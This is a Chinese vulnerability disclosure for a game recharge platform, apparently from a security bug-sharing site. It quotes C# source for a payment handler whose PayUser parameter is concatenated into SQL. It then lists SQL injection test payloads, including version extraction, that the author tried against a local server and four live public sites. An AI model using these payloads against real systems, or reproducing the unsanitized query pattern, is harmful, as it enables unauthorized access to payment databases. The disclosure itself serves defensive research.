### 简要描述: 通用性注入 ### 详细说明: 漏洞页面地址 ``` api/payment/checkparams.ashx ``` 源码如下 ``` <%@ WebHandler Language="C#" Class="com.xykj.pay.checkparams" %> using System.Web; using System.Text; using System.Collections.Generic; using System.Linq; using System.Globalization; namespace com.xykj.pay { /// <summary> /// 检查用户信息 /// </summary> public class checkparams : IHttpHandler { public void ProcessRequest(HttpContext context) { var param = context.Request.Params; var r = context.Response; var gid = param["GameId"];//游戏ID var sid = param["ServerId"];//服务器ID //r.Write("200"); //return; try { /*** 判断能否使用该充值方式 *******/ var NotAllow = new string[] { "gpay_epay_pay", "gpay_alipay_pay", "gpay_huanpay_pay", "gpay_shengpay_pay","gpay_eaypay_pay","gpay_huipay_pay", "gpay_xiuxian_pay","gpay_zhigame_pay","gpay_g265_pay","gpay_yeyou35_pay", "gpay_boof_pay"}; var payawy = param["PayAwy"].ToLower(); if (payawy.StartsWith("ty")) payawy = payawy.Substring(2); var payallow = ""; if (payawy.StartsWith("yee"))...
### 简要描述: 通用性注入 ### 详细说明: 漏洞页面地址 ``` api/payment/checkparams.ashx ``` 源码如下 ``` <%@ WebHandler Language="C#" Class="com.xykj.pay.checkparams" %> using System.Web; using System.Text; using System.Collections.Generic; using System.Linq; using System.Globalization; namespace com.xykj.pay { /// <summary> /// 检查用户信息 /// </summary> public class checkparams : IHttpHandler { public void ProcessRequest(HttpContext context) { var param = context.Request.Params; var r = context.Response; var gid = param["GameId"];//游戏ID var sid = param["ServerId"];//服务器ID //r.Write("200"); //return; try { /*** 判断能否使用该充值方式 *******/ var NotAllow = new string[] { "gpay_epay_pay", "gpay_alipay_pay", "gpay_huanpay_pay", "gpay_shengpay_pay","gpay_eaypay_pay","gpay_huipay_pay", "gpay_xiuxian_pay","gpay_zhigame_pay","gpay_g265_pay","gpay_yeyou35_pay", "gpay_boof_pay"}; var payawy = param["PayAwy"].ToLower(); if (payawy.StartsWith("ty")) payawy = payawy.Substring(2); var payallow = ""; if (payawy.StartsWith("yee")) payallow = "gpay_epay_pay"; else if (payawy.StartsWith("pt0")) payallow = "gpay_shengpay_pay"; else if (payawy.StartsWith("epay")) payallow = "gpay_eaypay_pay"; else if (payawy.StartsWith("hf")) payallow = "gpay_huipay_pay"; else if (payawy.StartsWith("1073")) payallow = "gpay_xiuxian_pay"; else if (payawy.StartsWith("zhigame")) payallow = "gpay_zhigame_pay"; else if (payawy.StartsWith("alipay")) payallow = "gpay_alipay_pay"; else if (payawy.StartsWith("hx")) payallow = "gpay_huanpay_pay"; else if (payawy.StartsWith("g265")) payallow = "gpay_g265_pay"; else if (payawy.StartsWith("yeyou35")) payallow = "gpay_yeyou35_pay"; else if (payawy.StartsWith("boopay")) payallow = "gpay_boof_pay"; business.View.Games.Port _port = new business.View.Games.Port(); var obj = _port.GetPayType(gid); if (obj.Contains(payallow)) { r.Write(string.Format("游戏:{0},不能使用该充值方式,请选择其他充值方式!", param["GameName"])); return; } /**********/ /*** 参数检查 *********/ var useraccount = param["PayUser"]; //没处理 var user = new com.xykj.business.View.Account.Account().GetUserByAccount(useraccount); //跟进 if (user == null) { r.Write("用户不存在,请检查账户是否填写正确"); return; } if (user.State == (int)com.xykj.common.Enums.UserState.Delete) { r.Write("该用户被删除,已经不能登录,禁止充值"); return; } if (user.State == (int)com.xykj.common.Enums.UserState.Lock) { r.Write("该用户被锁定,暂时不能登录,禁止充值"); return; } if (user.State == (int)com.xykj.common.Enums.UserState.Loss) { r.Write("该用户已挂失,禁止充值"); return; } if (param["PayTo"] == "game") { var _game = new business.View.Games.Game(); var game = _game.GetGame(XY.ToInt(gid)); if (game.Count > 0) { if (!game[0].OnPay) { r.Write("该游戏被管理员设置为禁止充值状态"); return; } } else { r.Write("游戏编号错误,请选择游戏"); return; } var _server = new business.View.Games.Server(); var server = _server.GetServer(XY.ToInt(sid)); if (server == null) { r.Write("服务器编号错误,请重新选择服务器"); return; } if (server.OnPay == false) { r.Write("该游戏服被管理员设置为禁止充值状态"); return; } /*#*#*#*#**#*#*#*#*#**#*#*#*#*#**#*#*#*#*#**#*/ /*** 检查用户是否在游戏中创建角色 ***********/ var port = _port.GetPortByGameId(server.GameId); if (port == null) { r.Write("服务器未搭建完全,请稍后进行充值!"); return; } com.xykj.games.UserEngine _ge = new games.UserEngine(); var rest = _ge.PayGame(user, game[0], server, port, null); if (rest != "-255") { r.Write("您未在该服务器建立角色,请确认充值服务器!"); return; } /*#*#*#*#**#*#*#*#*#**#*#*#*#*#**#*#*#*#*#**#*/ } /************************************/ if (param["PayTo"] == "station") { if (param["PayAwy"] == "tystationpay") { r.Write("不能用 " + app.Setting("sys_station_moneyname") + " 充值 " + app.Setting("sys_station_moneyname")); return; } if (param["PayAwy"].StartsWith("ty1073")) { r.Write("休闲游戏充值方式,只能用作游戏充值!"); return; } } if ("tystationpay" == param["PayAwy"]) { var currency = new com.xykj.business.Currency().GetMoney(user.ID); if (currency == null || currency.CanCurrency < decimal.Parse(param["PayMoney"])) { r.Write(app.Setting("sys_station_moneyname") + "数量不足,请先充值" + app.Setting("sys_station_moneyname") + "!"); return; } var bseMoney = decimal.Parse(param["GetMoney"]); if (bseMoney < decimal.Parse("1.000")) { r.Write("可获金币少于 1 元,不能充值!"); return; } } var pay_setting_money = app.Setting("pay_setting_money").Split(new string[] { "\r\n", "\r", "\n" }, System.StringSplitOptions.RemoveEmptyEntries); var mns = new Dictionary<int, string>(); foreach (var item in pay_setting_money) { if (item.Length < 2) continue; var moneys = item.Split(new char[] { ':' }); mns.Add(XY.ToInt(moneys[0]), moneys[1]); } var pay_money = param["PayMoney"]; if (!mns.ContainsKey(XY.ToInt(pay_money)))//兑换的游戏币 { r.Write("充值金额错误,请选择正确的金额"); return; } r.Write("200"); } catch (System.Exception er) { context.Response.Write("系统<br/>" + er.Message); } } public bool IsReusable { get { return false; } } } } ``` ``` public xy_users GetUserByAccount(string account) { XY.Cache.Delete(XY.MD5("select * from xy_users where Account='" + account + "'")); return this._user.GetUserByAccount(account); //没处理存在注入了 } ``` ### 漏洞证明: 漏洞证明 先本地验证吧 ``` http://192.168.1.108/api/payment/checkparams.ashx ``` 提交 ``` PayAwy=yee&gid=1&ServerId=2&PayUser=admin1 ``` 正常显示 [<img src="https://images.seebug.org/upload/201405/31120812406a10269762ca1d531bb01c96ea1032.png" alt="531.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/31120812406a10269762ca1d531bb01c96ea1032.png) 提交 ``` PayAwy=yee&gid=1&ServerId=2&PayUser=admin1' and 1=1 -- ``` 正常显示 [<img src="https://images.seebug.org/upload/201405/311209419e1d39eff13914898a9a42cbd71a0427.png" alt="53112.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/311209419e1d39eff13914898a9a42cbd71a0427.png) 提交 ``` PayAwy=yee&gid=1&ServerId=2&PayUser=admin1' and 1=2 -- ``` [<img src="https://images.seebug.org/upload/201405/311210213be054d5018312119f82770b0ad335ba.png" alt="5313.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/311210213be054d5018312119f82770b0ad335ba.png) 提交 ``` PayAwy=yee&gid=1&ServerId=2&PayUser=admin1' and (select @@version)>0-- ``` [<img src="https://images.seebug.org/upload/201405/31121228304847123ef13c46555fb54106e60b71.png" alt="5314.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/31121228304847123ef13c46555fb54106e60b71.png) 下面测试官网几套代码 由于有安全狗 这里只证明存在注入了 第一套 ``` http://xy001.52xinyou.cn/ ``` [<img src="https://images.seebug.org/upload/201405/3112155687465cbca077ef71a230d7fc0663d9ca.png" alt="5315.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/3112155687465cbca077ef71a230d7fc0663d9ca.png) [<img src="https://images.seebug.org/upload/201405/31121619d61b01b8b0a35136e4160513c3f79ded.png" alt="5316.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/31121619d61b01b8b0a35136e4160513c3f79ded.png) [<img src="https://images.seebug.org/upload/201405/3112163787556bf84ef55ba2fb908f5ee145bbd6.png" alt="5317.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/3112163787556bf84ef55ba2fb908f5ee145bbd6.png) 第二套 ``` http://xy002.52xinyou.cn/ ``` [<img src="https://images.seebug.org/upload/201405/311218449f54c8059d6e9f4da008392cbfcfe279.png" alt="5321.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/311218449f54c8059d6e9f4da008392cbfcfe279.png) [<img src="https://images.seebug.org/upload/201405/311218564669fab5f55049b0764da1c02422c22f.png" alt="5322.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/311218564669fab5f55049b0764da1c02422c22f.png) [<img src="https://images.seebug.org/upload/201405/31121912101c6b9f5be274ac28e24b197f4dc0c8.png" alt="5323.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/31121912101c6b9f5be274ac28e24b197f4dc0c8.png) 第三套 ``` http://xy003.52xinyou.cn ``` [<img src="https://images.seebug.org/upload/201405/311221265f4b23ffc44280e5ced279e972b9c857.png" alt="5324.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/311221265f4b23ffc44280e5ced279e972b9c857.png) [<img src="https://images.seebug.org/upload/201405/31122145e60ad964590177e19429173b60ceb587.png" alt="5325.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/31122145e60ad964590177e19429173b60ceb587.png) [<img src="https://images.seebug.org/upload/201405/3112220218e4e8904f0f90063b657e94363c1922.png" alt="5326.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/3112220218e4e8904f0f90063b657e94363c1922.png) 第四套 ``` http://xy006.52xinyou.cn ``` [<img src="https://images.seebug.org/upload/201405/31122531a06b3e8776ca9830146f0b1da3865de4.png" alt="5327.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/31122531a06b3e8776ca9830146f0b1da3865de4.png) [<img src="https://images.seebug.org/upload/201405/311225424ab4b93fc903423aaaaef3dee856a414.png" alt="5328.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/311225424ab4b93fc903423aaaaef3dee856a414.png) [<img src="https://images.seebug.org/upload/201405/311225579d707bf640efc11ffe6c1362d56b4996.png" alt="5329.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/311225579d707bf640efc11ffe6c1362d56b4996.png) 可证明存在注入 但是有安全狗 不好进一步验证了 漏洞确实存在
